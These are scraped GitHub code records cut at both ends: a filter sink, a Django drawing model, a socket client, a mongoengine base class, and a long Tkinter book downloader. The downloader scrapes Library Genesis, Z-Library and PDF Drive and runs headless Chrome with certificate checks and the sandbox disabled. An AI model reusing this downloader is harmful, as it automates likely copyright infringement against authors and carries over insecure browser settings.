self.config.exclude.value\n for exclude_file in self.config.exclude_files.value:\n for pattern in load_filter_file(exclude_file):\n if pattern not in exclude:\n exclude.append(pattern)\n\n # Optimization when no filter is requested to the input data\n if include == ['*'] and not exclude:\n return\n\n filtered = filter_dict(data, include, exclude)\n data.clear()\n data.update(filtered)\n\n\n__all__ = [\n 'Sink',\n 'FilterSink',\n]\n","repo_name":"kuralabs/flowbber","sub_path":"lib/flowbber/components/sink.py","file_name":"sink.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"18247102533","text":"from datetime import datetime\n\nfrom django.db.models import (\n ForeignKey,\n CharField,\n ImageField,\n Manager,\n ManyToManyField,\n PositiveIntegerField,\n Q,\n)\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom imagekit.models import ImageSpecField\nfrom imagekit.processors import ResizeToCover\nfrom model_utils.models import TimeStampedModel\n\nfrom .watermark import Watermark\n\nDRAWING_STATUS_STORED = 1\nDRAWING_STATUS_RESERVED = 2\nDRAWING_STATUS_SOLD = 3\n\nDRAWING_STATUS_CHOICES = (\n (DRAWING_STATUS_STORED, _('status-for-sale')),\n (DRAWING_STATUS_RESERVED, _('status-reserved')),\n (DRAWING_STATUS_SOLD, _('status-sold')),\n)\n\nDRAWING_AVAILABLE_STATES = [\n DRAWING_STATUS_STORED,\n]\n\n\nclass DrawingManager(Manager):\n def get_available(self):\n return self.filter(status__in=DRAWING_AVAILABLE_STATES)\n\n def get_price(self, ids):\n drawings = self.filter(id__in=ids).all()\n price = 0\n for drawing in drawings:\n price += drawing.get_price()\n\n return price\n\n\nclass Drawing(TimeStampedModel):\n objects = DrawingManager()\n name = CharField(\n max_length=255,\n verbose_name=_('field-name'),\n help_text=_('field-name-help-text'),\n )\n size = ForeignKey(\n 'DrawingSize',\n related_name='drawings',\n verbose_name=_('field-size'),\n )\n status = PositiveIntegerField(\n choices=DRAWING_STATUS_CHOICES,\n default=DRAWING_STATUS_STORED,\n verbose_name=_('field-drawing-status'),\n )\n image = ImageField(\n height_field=\"image_height\",\n upload_to='var/drawings',\n verbose_name=_(\"field-drawing-image\"),\n width_field=\"image_width\",\n )\n image_thumb_detail = ImageSpecField(\n source='image',\n format='JPEG',\n options={'quality': 95},\n processors=[\n ResizeToCover(600, 600),\n Watermark(\n 'web/static/images/watermark-black.png',\n 0.09,\n )\n ],\n )\n image_thumb_list = ImageSpecField(\n source='image',\n format='JPEG',\n options={'quality': 95},\n processors=[\n ResizeToCover(300, 300),\n Watermark(\n 'web/static/images/watermark-white.png',\n 0.1,\n ),\n ],\n )\n image_height = PositiveIntegerField(null=True)\n image_width = PositiveIntegerField(null=True)\n tags = ManyToManyField(\n 'DrawingTag',\n verbose_name=_('field-tags'),\n related_name='drawings',\n )\n\n class Meta:\n verbose_name = _('Drawing')\n verbose_name_plural = _('Drawings')\n\n def __str__(self):\n return '%s (%s)' % (self.name, self.size)\n\n def get_active_price_level(self):\n now = datetime.now()\n return self.price_levels.filter(\n (Q(valid_from__isnull=True) | Q(valid_from__gte=now)) &\n (Q(valid_until__isnull=True) | Q(valid_until__lte=now)),\n ).order_by('-created').first()\n\n def get_price(self):\n price_level = self.get_active_price_level()\n return price_level.price if price_level else None\n\n def is_price_visible(self):\n return self.status in DRAWING_AVAILABLE_STATES\n\n def is_status_visible(self):\n return self.status not in DRAWING_AVAILABLE_STATES\n\n def mark_as_reserved(self):\n self.status = DRAWING_STATUS_RESERVED\n\n def mark_as_sold(self):\n self.status = DRAWING_STATUS_SOLD\n\n def get_title(self):\n return '%s %s' % (self.size.name, self.name) if self.size.standalone_name else self.name\n","repo_name":"just-paja/malickosti-v-akvarelkach","sub_path":"drawings/models/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"504244575","text":"import socket\r\n\r\nserver_ip = '127.0.0.1'\r\nport = 9999\r\n\r\nclient = socket.socket()\r\n\r\nclient.connect((server_ip, port))\r\nprint('---Connected to server---')\r\n\r\nprint(\"type your name: \")\r\nmsg = input()\r\n\r\nclient.send(bytes(msg, 'utf-8'))\r\nprint('---Sent a message---')\r\n\r\nmsg = client.recv(1024)\r\nprint('---Got a message---')\r\nprint(msg)\r\n\r\nclient.close()\r\n","repo_name":"MysteryHub32/MysteryHub32","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"3188205459","text":"from mongoengine import Document, DateTimeField, BooleanField\nimport datetime\n\nclass BaseDocument(Document):\n meta = {'allow_inheritance': True}\n created_on = DateTimeField()\n modified_on = DateTimeField()\n deleted = BooleanField(default=False)\n\n def save(self, *args, **kwargs):\n if not self.created_on:\n self.created_on = datetime.datetime.now()\n self.modified_on = datetime.datetime.now()\n super(BaseDocument, self).save(*args, **kwargs)\n","repo_name":"ismail2smile/BookingHotel","sub_path":"baseDocumentConfig.py","file_name":"baseDocumentConfig.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5722941418","text":"import fitz\nimport requests\nimport time\nfrom bs4 import BeautifulSoup\nimport webbrowser \nfrom pandas import Series\nfrom pandas import DataFrame\nfrom pandas import read_html\nfrom numpy import array\nimport os\nfrom os import remove as os_remove\nfrom os import path as os_path\nfrom os import stat\nfrom os.path import exists\nfrom threading import Thread\nfrom socket import gethostbyname\nfrom socket import gethostname\nfrom pathlib import Path\nfrom download import download\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom tkinter import Tk\nfrom tkinter import PhotoImage\nfrom tkinter import Canvas\nfrom tkinter import Label\nfrom tkinter import Text\nfrom tkinter import Button\nfrom tkinter import messagebox\n# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef epub_to_pdf_gen(): \n downloads_path = str(Path.home() / \"Downloads\")\n for fname in os.listdir(downloads_path):\n if fname.endswith('.epub'):\n fname_n = fname.split('.epub')[0]\n file_path_epub = f\"{downloads_path}\\\\{fname_n}.epub\"\n file_path_pdf = f\"{downloads_path}\\\\{fname_n}.pdf\"\n try:\n doc = fitz.open(file_path_epub)\n a = doc.convert_to_pdf()\n pdf = fitz.open(\"pdf\", a)\n pdf.save(file_path_pdf)\n doc.close()\n os_remove(file_path_epub)\n except:\n pass\n# --------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef remove_character_not_valid_in_pdfname(a):\n char_list = \"/:?*<>|\"\n for i in char_list:\n a = a.replace(i, \"\")\n return a\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------------\npdf_size_to_download_for_zlib = \"\"\nbyte_info_for_pdfdrive = \"\"\nkeep_running = True\n# --------------------------------------------------------- LIBGEN -----------------------------------------------------------------------------------------\ndef downloaded_stat_for_libgen(Pdf_file_size_to_download):\n global keep_running\n while keep_running:\n for fname in os.listdir(downloads_path):\n if fname.endswith('.part'):\n try:\n file_size = os.path.getsize(f\"{downloads_path}\\\\{fname}\")\n info_text.config(text=f'Downloading....{round((file_size / (1024 * 1024)),1)} {Pdf_file_size_to_download.split()[1]} / {Pdf_file_size_to_download}')\n time.sleep(0.2) \n except Exception as e:\n print(e)\n if(keep_running == False):\n break\ndef search_in_libgen(author_searched_by_user, book_searched_by_user, extension):\n author = author_searched_by_user\n to_search = book_searched_by_user \n pdf_title = to_search\n to_search_online = to_search.replace(\" \", \"+\")\n link_to_search = f\"https://libgen.is/search.php?req={to_search_online}&open=0&res=100&view=simple&phrase=1&column=title\"\n download_of_libgen_completed = False\n # ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n list_of_dataframes = read_html(link_to_search)\n table = list_of_dataframes[2]\n a = list(table.loc[0])\n table.columns = a\n table.drop(0, axis=0, inplace=True)\n table.reset_index(inplace=True)\n table = table[(table['Extension'] == extension)]\n 
table.sort_values('Year', ascending=False, inplace=True)\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n titles_list = [soup.find_all('a', id=x)[0].getText() for x in table['ID']]\n table['Title'] = Series(titles_list, index=table.index, dtype='str')\n table = table.astype({'Author(s)': str, 'Title': str})\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n table_2 = table[['Author(s)', 'Title']]\n index_number = 0\n # ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_author(index_for_author):\n actual_author_name = table_2['Author(s)'][index_for_author].split(\" \") \n result = False\n for word in actual_author_name:\n if (word in author):\n result = True\n break\n if(len(author) == 0):\n result = True\n return result\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_title(title_of_book):\n len_of_book_searched = len(to_search.split(\" \"))\n len_of_book_by_libgen = len(title_of_book.split(\" \"))\n split_of_book_by_user = to_search.lower().split(\" \")\n split_of_book_by_libgen = title_of_book.lower().split(\" \")\n no_of_matches = 0\n if(len_of_book_searched <= len_of_book_by_libgen):\n for i in range(0, len_of_book_searched):\n if(split_of_book_by_libgen[i].lower() in split_of_book_by_user[i].lower()):\n no_of_matches += 1\n if(no_of_matches != len_of_book_searched):\n no_of_matches = 0\n for i in range(0, len_of_book_searched):\n if(split_of_book_by_user[i].lower() in split_of_book_by_libgen[i].lower()):\n no_of_matches += 1\n else:\n for i in range(0, len_of_book_by_libgen):\n if(split_of_book_by_libgen[i].lower() in split_of_book_by_user[i].lower()):\n no_of_matches += 1\n if(no_of_matches != len_of_book_by_libgen):\n no_of_matches = 0\n for i in range(0, len_of_book_by_libgen):\n if(split_of_book_by_user[i].lower() in split_of_book_by_libgen[i].lower()):\n no_of_matches += 1\n return ((no_of_matches == len_of_book_searched) or (no_of_matches == len_of_book_by_libgen))\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n book_found = False\n for i in table_2.index:\n if((check_for_title(table_2['Title'][i])) & (check_for_author(i))):\n book_found = True\n index_number = i\n break\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if(book_found):\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.select(\".c > tr > td > a\")\n c = []\n for i in a:\n b = i.get('href')\n if(b.find(\"book\") == 0):\n c.append(b.split(\"=\")[1])\n index_of_book_to_download = c\n link_of_download_page = f\"http://library.lol/main/{index_of_book_to_download[index_number]}\"\n # 
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n result_2 = requests.get(link_of_download_page)\n soup = BeautifulSoup(result_2.text, \"lxml\")\n d = soup.select(\"#download > h2 > a\")\n download_link = d[0].get('href')\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n url = download_link\n book_name = remove_character_not_valid_in_pdfname(table_2['Title'][index_number])\n downloads_path = str(Path.home() / \"Downloads\")\n global keep_running\n if(extension == 'pdf'):\n info_text.config(text=\"Downloading....\")\n file_path = f\"{downloads_path}\\\\{book_name}.pdf\"\n file_path_while_downloading = f\"{downloads_path}\\\\{book_name}.pdf.part\"\n pdf_file_size_to_download = table.loc[index_number][\"Size\"]\n thread_3 = Thread(target=downloaded_stat_for_libgen,args=(pdf_file_size_to_download,))\n thread_3.start()\n path = download(url, file_path, replace=True,kind=\"file\", timeout=300.0) \n button_1['state'] = \"normal\" \n keep_running = False\n info_text.config(text=\"Book has been downloaded!\")\n download_of_libgen_completed = True\n elif(extension == 'epub'):\n info_text.config(text=\"Downloading....\")\n file_path = f\"{downloads_path}\\\\{book_name}.epub\"\n pdf_file_size_to_download = table.loc[index_number][\"Size\"]\n thread_3 = Thread(target=downloaded_stat_for_libgen,args=(pdf_file_size_to_download,))\n thread_3.start()\n path = download(url, file_path, replace=True,kind=\"file\", timeout=300.0)\n epub_to_pdf_gen()\n button_1['state'] = \"normal\"\n keep_running = False\n info_text.config(text=\"Book has been downloaded!\")\n download_of_libgen_completed = True\n else:\n download_of_libgen_completed = False\n return download_of_libgen_completed\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------\n# ----------------------------------------------------------- PDF-Drive ------------------------------------------------------------------------------------------\ndef search_in_pdf_drive(author_searched_by_user, book_searched_by_user):\n author = author_searched_by_user\n author = author.split()\n to_search = book_searched_by_user\n pdf_title = to_search\n to_search_online = to_search.replace(\" \", \"-\")\n link_to_search = f\"http://www.pdfdrive.com/{to_search_online}-books.html\"\n download_of_pdfdrive_completed = False\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n try:\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n name_of_books = soup.select(\".ai-search > h2\")\n year_of_books = soup.select(\".file-info > .fi-year \")\n downloads_of_books = soup.select(\".file-info > .fi-hit\")\n to_make_download_links = soup.select(\".file-right > a \")\n # ----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n a = []\n b = []\n for x in name_of_books:\n a.append(x.getText())\n for y in downloads_of_books:\n b.append(int(y.getText().split(\" \")[0].replace(\",\", \"\")))\n # 
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n df_book = DataFrame(data=zip(a, b), columns=[\"Book\", \"Downloads\"])\n df_book = df_book.astype({\"Book\": str, \"Downloads\": int})\n df_book.sort_values(\"Downloads\", ascending=False, inplace=True)\n index_of_book = -1\n for x in df_book.index:\n if df_book.loc[x][\"Book\"].lower().find(to_search.lower()) == 0:\n index_of_book = x\n break\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if index_of_book > -1:\n raw_download_link = to_make_download_links[index_of_book].get(\"href\")\n download_link = raw_download_link[::-1].replace(\"e\", \"d\", 1)[::-1]\n link_of_download_page = f\"http://www.pdfdrive.com{download_link}\"\n result = requests.get(f\"http://www.pdfdrive.com{raw_download_link}\")\n soup = BeautifulSoup(result.text, \"lxml\")\n book_info_for_pdfdrive = soup.select(\".ebook-file-info > .info-green\")\n global byte_info_for_pdfdrive\n for i in book_info_for_pdfdrive:\n if \"KB\" in i.getText():\n byte_info_for_pdfdrive = i.getText()\n break\n elif \"MB\" in i.getText():\n byte_info_for_pdfdrive = i.getText()\n break\n download_of_pdfdrive_completed = selenium_headless_downloader(\"pdfdrive\", link_of_download_page, \"pdf\")\n else:\n download_of_pdfdrive_completed = False\n except:\n pass\n return download_of_pdfdrive_completed\n# -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------ Zlib --------------------------------------------------------------------------------\ndef search_in_zlib(author_searched_by_user, book_searched_by_user, extension):\n author = author_searched_by_user\n to_search = book_searched_by_user\n pdf_title = to_search\n to_search_online = (to_search.replace(\" \", \"%20\") + \"%20\" + author.replace(\" \", \"%20\"))\n link_to_search = f\"https://b-ok.asia/s/{to_search_online}/?languages%5B0%5D=english&extensions%5B0%5D={extension}\"\n author = author.split()\n download_of_zlib_completed = False\n # --------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n try:\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.select(\".book-rating-interest-score\")\n b = soup.select(\".book-rating-quality-score\")\n book_rating_interest_score_list = array([float(x.getText().strip()) for x in a])\n book_rating_quality_score_list = array([float(y.getText().strip()) for y in b])\n rating_of_book_list = (book_rating_interest_score_list + book_rating_quality_score_list)\n d = soup.find_all(\"h3\", itemprop=\"name\")\n link_of_book_list = [(\"https://b-ok.asia\" + x.select(\"a\")[0].get(\"href\")) for x in d]\n title_of_book_list = [x.select(\"a\")[0].getText() for x in d]\n # ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n e = soup.find_all(\"div\", class_=\"authors\")\n author_list = []\n for length in e:\n individual_author_name = \"\"\n for element in length:\n individual_author_name = 
individual_author_name + element.getText() + \" \"\n author_list.append(individual_author_name)\n books_dataframe = DataFrame({\"Title\": title_of_book_list,\"Author\": author_list,\"Rating\": rating_of_book_list,\"Link\": link_of_book_list,})\n books_dataframe = books_dataframe.astype({\"Title\": str, \"Author\": str, \"Rating\": float, \"Link\": str})\n books_dataframe.sort_values(\"Rating\", ascending=False, inplace=True)\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_author(index_for_author,): \n actual_author_name = books_dataframe[\"Author\"][index_for_author].split(\" \") \n result = (False)\n for (word) in (actual_author_name): \n if word in author: \n result = True\n break\n if len(author) == 0:\n result = True\n return result\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_title(title_of_book,): \n len_of_book_searched = len(to_search.split(\" \")) \n len_of_book_by_zlib = len(title_of_book.split(\" \"))\n split_of_book_by_user = to_search.lower().split(\" \") \n split_of_book_by_zlib = title_of_book.lower().split(\" \") \n no_of_matches = 0 \n for i in range(0, len_of_book_by_zlib): \n if (split_of_book_by_zlib[i].lower() in to_search.lower()): \n no_of_matches += (1)\n if no_of_matches != len_of_book_by_zlib:\n no_of_matches = 0\n for i in range(0, len_of_book_searched): \n if (split_of_book_by_user[i].lower() in title_of_book.lower()): \n no_of_matches += 1\n return (no_of_matches == len_of_book_searched) or (no_of_matches == len_of_book_by_zlib)\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n book_found = False\n index_number = 0\n for(i) in (books_dataframe.index): \n if (check_for_title(books_dataframe[\"Title\"][i])) & (check_for_author(i)): \n book_found = True\n index_number = i \n break\n # ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if book_found:\n link_of_download_page = books_dataframe.loc[index_number, \"Link\"]\n try:\n result = requests.get(link_of_download_page)\n soup = BeautifulSoup(result.text, \"lxml\")\n global pdf_size_to_download_for_zlib\n pdf_size_to_download_for_zlib = soup.select(\".bookDetailsBox > .bookProperty.property__file > .property_value \")[0].getText().split(\",\")[1]\n except:\n print(\"Error faced\")\n download_of_zlib_completed = selenium_headless_downloader(\"zlib\", link_of_download_page, extension)\n else:\n download_of_zlib_completed = False\n except:\n pass\n return download_of_zlib_completed\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------ SELENIUM FOR PDF-DRIVE & ZLIB ----------------------------------------------------------------\ndef resource_path(relative_path):\n try:\n base_path = sys._MEIPASS\n except Exception:\n base_path = os_path.dirname(__file__)\n return os_path.join(base_path, relative_path)\n# 
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef remove_unwanted_characters_for_pdfdrive(pdf_name: str,) -> str:\n chars = list(\"/:?*<>|,.();\")\n result = pdf_name\n for char in chars:\n result = result.replace(char, \"_\")\n return result\ndownloads_path = str(Path.home() / \"Downloads\")\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef book_title_for_pdfdrive(download_link):\n result = requests.get(download_link)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.find(\"h1\", class_=\"ebook-title\")\n title_of_book = a.select(\"a\")[0].getText()\n title_of_book = title_of_book.replace(\":\", \"_\")\n return title_of_book\n# ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef book_title_for_zlib(download_link):\n result = requests.get(download_link)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.find(\"h1\", itemprop=\"name\").getText()\n a = a.strip(\" \\n\")\n b = soup.find(\"div\", class_=\"col-sm-9\")\n b = b.find_all(\"a\", title=\"Find all the author's books\")\n title_of_pdf = a\n c = \"\"\n if len(b) > 1:\n for x in b:\n c = c + x.getText() + \", \"\n c = c.strip(\", \")\n title_of_pdf = title_of_pdf + \" \" + f\"({c})\"\n elif len(b) == 1:\n title_of_pdf = title_of_pdf + \" \" + f\"({b[0].getText()})\"\n return title_of_pdf\n# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef selenium_headless_downloader(website, download_link, extension):\n user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36\"\n options = webdriver.ChromeOptions()\n options.headless = True\n options.add_argument(f\"user-agent={user_agent}\")\n options.add_argument(\"--window-size=1920,1080\")\n options.add_argument(\"--ignore-certificate-errors\")\n options.add_argument(\"--allow-running-insecure-content\")\n options.add_argument(\"--disable-extensions\")\n options.add_argument(\"--proxy-server='direct://'\")\n options.add_argument(\"--proxy-bypass-list=*\")\n options.add_argument(\"--start-maximized\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--disable-dev-shm-usage\")\n options.add_argument(\"--no-sandbox\")\n options.add_experimental_option(\"detach\", True)\n driver = webdriver.Chrome(resource_path(\"chromedriver.exe\"), options=options)\n params = {\"behavior\": \"allow\", \"downloadPath\": downloads_path}\n driver.execute_cdp_cmd(\"Page.setDownloadBehavior\", params)\n download_complete_via_selenium = False\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if website == \"pdfdrive\":\n try:\n driver.get(download_link)\n except:\n info_text.config(text=\"Servor Error. 
Please Try Again\")\n button_1['state'] = \"normal\"\n driver.implicitly_wait(10)\n webdriver.ActionChains(driver).send_keys(Keys.ESCAPE).perform()\n content = driver.find_elements(By.CLASS_NAME, \"btn.btn-success.btn-responsive\") \n if len(content) == 0:\n content = driver.find_element(By.CLASS_NAME, \"btn.btn-primary.btn-user\") \n else:\n content = driver.find_element(By.CLASS_NAME, \"btn.btn-success.btn-responsive\") \n elif website == \"zlib\":\n try:\n driver.get(download_link)\n except:\n info_text.config(text=\"Servor Error. Please Try Again\")\n button_1['state'] = \"normal\"\n content = driver.find_element(By.CLASS_NAME, \"book-details-button\")\n # --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n content.click()\n # --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n title_of_book = \"\"\n if website == \"pdfdrive\":\n print(\"Downloading E-Book from PDF-Drive Please check your Downloads Folder\")\n info_text.config(text=\"Downloading....\")\n title_of_book = book_title_for_pdfdrive(download_link)\n title_of_book = remove_unwanted_characters_for_pdfdrive(title_of_book)\n title_of_book = title_of_book + \" ( PDFDrive )\"\n file_name_pdfdrive = \"\" \n path_to_file = \"\" \n while True:\n for fname in os.listdir(downloads_path):\n if fname.endswith('.crdownload'):\n if(file_name_pdfdrive == \"\"):\n file_name_pdfdrive = fname.split(\".crdownload\")[0]\n path_to_file = f\"{downloads_path}\\\\{file_name_pdfdrive}\"\n try:\n file_size = os.path.getsize(f\"{downloads_path}\\\\{fname}\")\n info_text.config(text=f'Downloading....{round((file_size / (1024 * 1024)),1)} {byte_info_for_pdfdrive.split()[1]} / {byte_info_for_pdfdrive}')\n time.sleep(0.2)\n except Exception as e:\n print(e)\n elif (fname == file_name_pdfdrive):\n path_to_file = f\"{downloads_path}\\\\{file_name_pdfdrive}\" \n break\n try:\n file_exists = exists(path_to_file)\n if file_exists:\n break\n except Exception as e:\n print(e)\n pass\n epub_to_pdf_gen()\n download_complete_via_selenium = True\n button_1['state'] = \"normal\"\n info_text.config(text=\"Book has been downloaded!\")\n driver.quit()\n elif website == \"zlib\":\n result = requests.get(driver.current_url)\n soup = BeautifulSoup(result.text, \"lxml\")\n try:\n driver.find_element(By.CLASS_NAME, \"download-limits-error\")\n download_complete_via_selenium = False\n print(\"Zlibs Daily Limit Error\")\n except:\n print(\"Downloading E-Book from Zlib \\nPlease check your Downloads Folder\")\n info_text.config(text=\"Downloading....\")\n title_of_book = book_title_for_zlib(download_link)\n title_of_book = remove_character_not_valid_in_pdfname(title_of_book)\n title_of_book = title_of_book + \" (z-lib.org)\"\n file_name_zlib = \"\" \n path_to_file = \"\" \n while True:\n for fname in os.listdir(downloads_path):\n if fname.endswith('.crdownload'):\n if(file_name_zlib == \"\"):\n file_name_zlib = fname.split(\".crdownload\")[0]\n path_to_file = f\"{downloads_path}\\\\{file_name_zlib}\"\n try:\n file_size = os.path.getsize(f\"{downloads_path}\\\\{fname}\")\n info_text.config(text=f'Downloading....{round((file_size / (1024 * 1024)),1)} MB / {str(pdf_size_to_download_for_zlib)}')\n time.sleep(0.2)\n except Exception as e:\n print(e)\n elif (fname == file_name_zlib):\n path_to_file = 
f\"{downloads_path}\\\\{file_name_zlib}\" \n break\n try:\n file_exists = exists(path_to_file)\n if file_exists:\n break\n except Exception as e:\n print(e)\n pass\n download_complete_via_selenium = True\n epub_to_pdf_gen()\n button_1['state'] = \"normal\"\n info_text.config(text=\"Book has been downloaded!\")\n driver.quit()\n return download_complete_via_selenium\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------\n# --------------------------------------------------------------- SEARCH A BOOK ---------------------------------------------------------------------------------------------------------------------\ndef remove_unwanted_characters_from_author(a):\n char_list = \"/:?*<>|,.();\"\n for i in char_list:\n a = a.replace(i, \"\")\n return a\ndef easy_search_for_book(a):\n char_list = \":?;*,(|#[!@$%+={<\"\n for i in char_list:\n if(i in a):\n a = a.split(i)[0]\n break\n return a\n# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef search_the_book(author_, book_):\n author = author_\n book = book_\n characters_to_strip = \" .,;:/?!#*&^-}_{~`@$%)[](<>|+=\"\n author = author.strip(characters_to_strip)\n book = book.strip(characters_to_strip)\n author = remove_unwanted_characters_from_author(author)\n book = easy_search_for_book(book)\n# ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n extension_pdf = 'pdf'\n if(search_in_libgen(author, book, extension_pdf) == False):\n if(search_in_zlib(author, book, extension_pdf) == False):\n extension_epub = 'epub'\n if(search_in_libgen(author, book, extension_epub) == False):\n if(search_in_zlib(author, book, extension_epub) == False):\n extension_pdf = 'pdf'\n if(search_in_pdf_drive(author, book) == False):\n print('The Book is not available in the Ebook Format')\n info_text.config(text=\"Book Not Available\")\n button_1['state'] = \"normal\"\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n# --------------------------------------------------------Current GUI -----------------------------------------------------------------------------------------------------------------------\nwindow = Tk()\nwindow.geometry(\"574x230\")\nwindow.title(\"Books.io\")\nphoto = PhotoImage(file=resource_path(\"book.png\"))\nwindow.iconphoto(False, photo)\nwindow.configure(bg=\"#FFFFFF\")\ncanvas = Canvas(window,bg=\"#FFFFFF\",height=287,width=574,bd=0,highlightthickness=0,relief=\"ridge\")\ncanvas.place(x=0, y=0)\ncanvas.create_text(27.600372314453125,96.34383392333984,anchor=\"nw\",text=\"Author\",fill=\"#000000\",font=(\"Abel Regular\", 20 * -1))\ninfo_text = Label(window,background=\"#FFFFFF\",text=\"\",font=(\"Abel Regular\", 7))\ninfo_text.place(relx=0.0,rely=1.0,anchor='sw')\ninfo_text_for_download = Label(window,background=\"#FFFFFF\",text=\"Tip: Use the exact Book Title and Author Name\",font=(\"Abel Regular\", 7),fg=\"green\")\ninfo_text_for_download.place(relx=0.16,rely=0.04)\ndef callback(url):\n webbrowser.open_new_tab(url)\ninfo_text_for_github = Label(window,background=\"#FFFFFF\",text=\"Give a star to our 
project\",fg=\"blue\",cursor=\"hand2\",font=(\"Abel Regular\", 7))\ninfo_text_for_github.pack()\ninfo_text_for_github.bind(\"\", lambda e: callback(\"https://github.com/RohitKonge/PDF-Version-of-any-Book\"))\ninfo_text_for_github.place(relx=1.0,rely=1.0,anchor='se')\ncanvas.create_text(32.243743896484375,28.401931762695312,anchor=\"nw\",text=\"Book\",fill=\"#000000\",font=(\"Abel Regular\", 20 * -1))\nentry_image_1 = PhotoImage(file=resource_path(\"entry_1.png\"))\nentry_bg_1 = canvas.create_image(316.0,38.5,image=entry_image_1)\nentry_1 = Text(font=(\"Abel Regular\", 10),bd=0,bg=\"#FFFFFF\",highlightthickness=0)\nentry_1.place(x=94.0,y=28.6,width=444.0,height=22.0)\nentry_image_2 = PhotoImage(file=resource_path(\"entry_2.png\"))\nentry_bg_2 = canvas.create_image(316.0,106.5,image=entry_image_2)\nentry_2 = Text(font=(\"Abel Regular\", 10),bd=0,bg=\"#FFFFFF\",highlightthickness=0)\nentry_2.place(x=94.0,y=96.6,width=444.0,height=22.0)\ndef btn_click():\n book_inp = entry_1.get(1.0, \"end-1c\")\n author_inp = entry_2.get(1.0, \"end-1c\")\n book_inp = book_inp.strip()\n author_inp = author_inp.strip()\n book_inp = book_inp.title()\n author_inp = author_inp.title()\n global keep_running\n if(book_inp == \"\" and author_inp == \"\"):\n info_text.config(text=\"Please enter the Book's Title and Author\")\n button_1['state'] = \"normal\"\n elif(book_inp == \"\" and author_inp != \"\"):\n info_text.config(text=\"Please enter the Book's Title\")\n button_1['state'] = \"normal\"\n else:\n keep_running = True\n search_the_book(author_inp, book_inp)\n thread_2 = Thread()\n thread_2.start()\n thread_2.join()\ndef thread_make():\n if(check_internet_connection()):\n info_text.config(text=\"Searching....\")\n button_1['state'] = \"disabled\"\n try:\n thread_1 = Thread(target=btn_click)\n thread_1.start()\n except:\n info_text.config(text=\"Please Restart the App\")\ndef check_internet_connection():\n connected_to_internet = False\n IPaddress = gethostbyname(gethostname())\n if IPaddress == \"127.0.0.1\":\n connected_to_internet = False\n info_text.config(text=\"Check your internet connection\")\n else:\n connected_to_internet = True\n return connected_to_internet\ncheck_internet_connection()\nbutton_image_1 = PhotoImage(file=resource_path(\"button_1.png\"))\nbutton_1 = Button(image=button_image_1,borderwidth=0,highlightthickness=0,command=thread_make,relief=\"flat\",cursor=\"hand2\",state=\"normal\")\nbutton_1.place(x=200.0,y=150.0,width=174.8668212890625,height=43.995155334472656)\ndef on_opening():\n for fname in os.listdir(downloads_path):\n if (fname.endswith('.part') or fname.endswith('.crdownload')):\n try:\n os_remove((f\"{downloads_path}\\\\{fname}\"))\n except Exception as e:\n print(e) \ndef on_closing():\n for fname in 